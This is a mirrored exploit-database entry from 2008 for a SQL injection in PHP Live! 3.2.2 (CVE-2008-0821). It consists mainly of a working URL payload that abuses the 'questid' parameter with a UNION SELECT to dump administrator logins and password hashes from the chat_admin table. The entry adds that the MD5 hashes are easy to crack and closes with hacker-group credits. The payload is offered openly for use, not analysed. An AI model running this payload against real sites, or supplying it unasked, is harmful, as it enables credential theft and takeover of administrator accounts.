[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Live! 3.2.2 - 'questid' SQL Injection (1)

Author: Xar
type: webapps
platform: php
port: 
date_added: 2008-02-13 
date_updated: 2016-11-11 
verified: 1 
codes: OSVDB-42186;CVE-2008-0821 
tags: 
aliases:  
screenshot_url:  
application_url: 
[!]Info[!]

PHP Live! (© OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website.

[!]SQL Injection[!]

Code:
phplive//admin/traffic/knowledg
e_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a

[!]Info[!]
+Hashes are regular md5 - easy to crack


Dork: "Find your own ;)"

Credits -

Found by Xar of h4ck-y0u

Greets to Don & ViSiOn

# milw0rm.com [2008-02-14]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.